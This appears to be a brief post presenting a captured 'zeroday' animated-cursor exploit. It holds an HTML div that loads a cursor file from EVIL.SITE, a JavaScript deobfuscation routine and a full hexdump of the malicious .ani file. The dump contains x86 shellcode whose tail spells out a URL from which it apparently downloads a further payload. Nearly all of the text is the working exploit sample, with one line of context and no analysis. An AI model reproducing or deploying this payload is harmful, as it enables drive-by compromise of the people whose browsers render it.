Zeroday 01100100011010010

<DIV style=”CURSOR: url(‘http://EVIL.SITE/x/anifile.php’)”></DIV>

This was found after unraveling a few layers of dense javascript obfuscation.

function dF(s)
{
var s1 = unescape(s.substr(0,s.length-1));
var t='';
for (i=0;i < s1.length;i++) t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
alert(unescape(t));
}

oday@silver-surfer:~$ hexdump anifile.php
0000000 4952 4646 4022 0000 4341 4e4f 6e61 6869
0000010 0024 0000 0024 0000 ffff 0000 0009 0000
0000020 0000 0000 0000 0000 0000 0000 0000 0000
0000030 0004 0000 0001 0000 5354 4c49 0003 0000
0000040 0000 0000 5354 4c49 0004 0000 0202 0202
0000050 6e61 6869 0052 0000 3130 3332 3130 3332
0000060 3130 3332 3130 3332 3130 3332 3130 3332
0000070 3130 3332 3130 3332 3400 3434 3434 3434
0000080 3434 3434 3434 3434 3434 3434 3434 3434
0000090 3434 3434 0000 0000 0000 0000 0000 0000
00000a0 0000 0000 0000 0000 25ba ec8b 8b64 3015
00000b0 0000 8d00 0352 3a80 0f01 c884 0000 c600
00000c0 0102 4be8 0001 6800 0300 0000 006a d0ff
00000d0 00b9 0003 8b00 ebf8 5e05 a4f3 d0ff f6e8
00000e0 ffff ebff 5717 8be8 0001 8b00 33f8 49c9
00000f0 c033 c3b0 f2fc 8dae ff47 c35f f5e9 0001
0000100 5b00 ec81 0114 0000 d48b c73e 6302 646d
0000110 3e20 42c7 2f04 2063 8322 08c2 c033 5050
0000120 0468 0001 5200 5053 21e8 0001 ff00 8bd0
0000130 8bfc 83c7 08c0 8a3e 8418 74db 4003 f6eb
0000140 c63e 2200 d233 883e 0150 ec83 3354 33c0
0000150 8bdb 83cc 54f8 097d 893e 011c c083 eb04
0000160 8bf2 8bcc 83d9 10c3 c033 c73e 2c43 0001
0000170 0000 5351 5050 5050 5050 5057 b9e8 0000
0000180 e800 0004 0000 6a90 c300 3880 7455 810f
0000190 0578 9090 9090 0674 8b55 8dec 0540 e0ff
00001a0 6f68 006e 6800 5255 6d4c 12eb 448d 0424
00001b0 e850 ff2f ffff e850 00a6 0000 cceb e9e8
00001c0 ffff 83ff 08c4 6ac3 686c 746e 6c64 12eb
00001d0 448d 0424 e850 ff0b ffff e850 0082 0000
00001e0 a8eb e9e8 ffff 83ff 08c4 68c3 3233 0000
00001f0 7568 6573 eb72 8d12 2444 5004 e4e8 fffe
0000200 50ff 5be8 0000 eb00 e881 ffe9 ffff c483
0000210 c308 5fe8 0000 6800 97ec 0c03 e850 007a
0000220 0000 c483 c308 4be8 0000 6800 fcaa 7c0d
0000230 e850 0066 0000 c483 c308 37e8 0000 6800
0000240 fe72 16b3 e850 0052 0000 c483 c308 4de8
0000250 ffff 68ff ef4f 054f e850 003e 0000 c483
0000260 c308 0fe8 0000 6800 4e8e ec0e e850 002a
0000270 0000 c483 c308 c033 8b64 3040 c085 1078
0000280 8b3e 0c40 8b3e 1c70 3ead 408b c308 0beb
0000290 8b3e 3440 c083 3e7c 408b c33c 3660 6c8b
00002a0 2424 8b36 3c45 8b36 0554 0378 3ed5 4a8b
00002b0 3e18 5a8b 0320 e3dd 493b 8b3e 8b34 f503
00002c0 ff33 c033 acfc c084 0774 cfc1 030d ebf8
00002d0 36f4 7c3b 2824 df75 8b3e 245a dd03 3e66
00002e0 0c8b 3e4b 5a8b 031c 3edd 048b 038b 36c5
00002f0 4489 1c24 c361 06e8 fffe 68ff 7474 3a70
0000300 2f2f 6568 6e72 7465 692e 666e 2f6f 2f78
0000310 6966 656c 702e 7068
0000318